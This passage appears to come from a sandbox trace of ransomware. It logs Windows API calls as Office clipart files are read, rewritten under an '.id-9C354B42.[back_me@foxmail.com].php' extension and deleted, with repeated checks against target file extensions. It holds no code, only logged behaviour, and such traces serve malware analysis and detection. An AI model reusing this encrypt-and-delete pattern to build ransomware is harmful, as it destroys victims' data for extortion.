Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0053.347] GetLastError () returned 0x0 [0053.347] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x14c3, lpOverlapped=0x0) returned 1 [0053.666] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x14d0, lpOverlapped=0x0) returned 1 [0053.670] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.670] WriteFile (in: hFile=0x218, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.670] SetEndOfFile (hFile=0x218) returned 1 [0053.720] CloseHandle (hObject=0x218) returned 1 [0053.720] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.721] SetEndOfFile (hFile=0x21c) returned 1 [0054.282] CloseHandle (hObject=0x21c) returned 1 [0054.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0054.283] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0054.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0054.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0054.283] lstrlenW (lpString=".doc") returned 4 [0054.283] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0054.283] lstrlenW (lpString=".docx") returned 5 [0054.283] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0054.283] lstrlenW (lpString=".pdf") returned 4 [0054.283] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0054.283] lstrlenW (lpString=".xls") returned 4 [0054.283] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0054.283] lstrlenW (lpString=".xlsx") returned 5 [0054.283] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0054.283] lstrlenW (lpString=".ppt") returned 4 [0054.283] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0054.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0054.283] lstrlenW (lpString=".zip") returned 4 [0054.284] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0054.284] lstrlenW (lpString=".rar") returned 4 [0054.284] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0054.284] lstrlenW (lpString=".bz2") returned 4 [0054.284] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0054.284] lstrlenW (lpString=".7z") returned 3 [0054.284] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0054.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0054.284] lstrlenW (lpString=".dbf") returned 4 [0054.284] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0054.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0054.284] lstrlenW (lpString=".1cd") returned 4 [0054.284] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0054.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0054.284] lstrlenW (lpString=".jpg") returned 4 [0054.284] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0054.287] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x312ff1c | out: lpFileSize=0x312ff1c*=4734) returned 1 [0054.287] CloseHandle (hObject=0x21c) returned 1 [0054.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 0x20 [0054.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0054.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0054.287] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.287] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0054.288] GetLastError () returned 0x0 [0054.288] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x127e, lpOverlapped=0x0) returned 1 [0054.422] WriteFile (in: hFile=0x1c0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1280, lpOverlapped=0x0) returned 1 [0054.424] ReadFile (in: hFile=0x21c, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.424] WriteFile (in: hFile=0x1c0, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.424] SetEndOfFile (hFile=0x1c0) returned 1 [0054.424] CloseHandle (hObject=0x1c0) returned 1 [0054.424] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.424] SetEndOfFile (hFile=0x21c) returned 1 [0054.425] CloseHandle (hObject=0x21c) returned 1 [0054.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0054.426] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00015_.wmf")) returned 1 [0054.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0054.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0054.426] lstrlenW (lpString=".doc") returned 4 [0054.426] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.426] lstrlenW (lpString=".docx") returned 5 [0054.426] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.426] lstrlenW (lpString=".pdf") returned 4 [0054.426] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.426] lstrlenW (lpString=".xls") returned 4 [0054.426] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.426] lstrlenW (lpString=".xlsx") returned 5 [0054.426] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.426] lstrlenW (lpString=".ppt") returned 4 [0054.426] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0054.426] lstrlenW (lpString=".zip") returned 4 [0054.426] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.426] lstrlenW (lpString=".rar") returned 4 [0054.426] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.426] lstrlenW (lpString=".bz2") returned 4 [0054.426] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.426] lstrlenW (lpString=".7z") returned 3 [0054.426] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0054.427] lstrlenW (lpString=".dbf") returned 4 [0054.427] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0054.427] lstrlenW (lpString=".1cd") returned 4 [0054.427] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00015_.WMF") returned 63 [0054.427] lstrlenW (lpString=".jpg") returned 4 [0054.427] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.297] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.298] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0056.321] GetLastError () returned 0x0 [0056.322] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x1634, lpOverlapped=0x0) returned 1 [0056.326] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1640, lpOverlapped=0x0) returned 1 [0056.327] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.327] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.327] SetEndOfFile (hFile=0x194) returned 1 [0056.327] CloseHandle (hObject=0x194) returned 1 [0056.327] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.328] SetEndOfFile (hFile=0x214) returned 1 [0056.328] CloseHandle (hObject=0x214) returned 1 [0056.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.329] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0056.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0056.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0056.329] lstrlenW (lpString=".doc") returned 4 [0056.329] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.329] lstrlenW (lpString=".docx") returned 5 [0056.329] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.329] lstrlenW (lpString=".pdf") returned 4 [0056.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.329] lstrlenW (lpString=".xls") returned 4 [0056.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.329] lstrlenW (lpString=".xlsx") returned 5 [0056.329] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.329] lstrlenW (lpString=".ppt") returned 4 [0056.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0056.329] lstrlenW (lpString=".zip") returned 4 [0056.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.329] lstrlenW (lpString=".rar") returned 4 [0056.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.329] lstrlenW (lpString=".bz2") returned 4 [0056.329] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.330] lstrlenW (lpString=".7z") returned 3 [0056.330] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0056.330] lstrlenW (lpString=".dbf") returned 4 [0056.330] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0056.330] lstrlenW (lpString=".1cd") returned 4 [0056.330] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.330] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 63 [0056.330] lstrlenW (lpString=".jpg") returned 4 [0056.330] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.330] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.330] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0056.331] GetLastError () returned 0x0 [0056.331] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0xbc4, lpOverlapped=0x0) returned 1 [0056.333] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0056.335] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.335] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.335] SetEndOfFile (hFile=0x194) returned 1 [0056.335] CloseHandle (hObject=0x194) returned 1 [0056.335] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.335] SetEndOfFile (hFile=0x214) returned 1 [0056.336] CloseHandle (hObject=0x214) returned 1 [0056.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.336] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0056.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0056.336] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0056.336] lstrlenW (lpString=".doc") returned 4 [0056.336] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.336] lstrlenW (lpString=".docx") returned 5 [0056.336] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.336] lstrlenW (lpString=".pdf") returned 4 [0056.336] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.336] lstrlenW (lpString=".xls") returned 4 [0056.337] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.337] lstrlenW (lpString=".xlsx") returned 5 [0056.337] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.337] lstrlenW (lpString=".ppt") returned 4 [0056.337] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0056.337] lstrlenW (lpString=".zip") returned 4 [0056.337] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.337] lstrlenW (lpString=".rar") returned 4 [0056.337] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.337] lstrlenW (lpString=".bz2") returned 4 [0056.337] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.337] lstrlenW (lpString=".7z") returned 3 [0056.337] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0056.337] lstrlenW (lpString=".dbf") returned 4 [0056.337] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0056.337] lstrlenW (lpString=".1cd") returned 4 [0056.337] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.337] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0056.337] lstrlenW (lpString=".jpg") returned 4 [0056.337] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.337] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.338] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0056.338] GetLastError () returned 0x0 [0056.338] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0xac4, lpOverlapped=0x0) returned 1 [0056.341] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xad0, lpOverlapped=0x0) returned 1 [0056.342] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.342] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.342] SetEndOfFile (hFile=0x194) returned 1 [0056.342] CloseHandle (hObject=0x194) returned 1 [0056.342] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.342] SetEndOfFile (hFile=0x214) returned 1 [0056.343] CloseHandle (hObject=0x214) returned 1 [0056.343] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.343] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0056.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0056.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0056.344] lstrlenW (lpString=".doc") returned 4 [0056.344] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.344] lstrlenW (lpString=".docx") returned 5 [0056.344] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.344] lstrlenW (lpString=".pdf") returned 4 [0056.344] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.344] lstrlenW (lpString=".xls") returned 4 [0056.344] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.344] lstrlenW (lpString=".xlsx") returned 5 [0056.344] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.344] lstrlenW (lpString=".ppt") returned 4 [0056.344] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0056.344] lstrlenW (lpString=".zip") returned 4 [0056.344] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.344] lstrlenW (lpString=".rar") returned 4 [0056.344] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.344] lstrlenW (lpString=".bz2") returned 4 [0056.344] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.344] lstrlenW (lpString=".7z") returned 3 [0056.344] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0056.344] lstrlenW (lpString=".dbf") returned 4 [0056.344] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0056.345] lstrlenW (lpString=".1cd") returned 4 [0056.345] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.345] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 63 [0056.345] lstrlenW (lpString=".jpg") returned 4 [0056.345] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.345] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.345] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x312fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0056.345] GetLastError () returned 0x0 [0056.345] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x1ccc, lpOverlapped=0x0) returned 1 [0056.351] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0x1cd0, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0x1cd0, lpOverlapped=0x0) returned 1 [0056.352] ReadFile (in: hFile=0x214, lpBuffer=0x3670020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x312fed4, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesRead=0x312fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.352] WriteFile (in: hFile=0x194, lpBuffer=0x3670020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x312fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3670020*, lpNumberOfBytesWritten=0x312fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.352] SetEndOfFile (hFile=0x194) returned 1 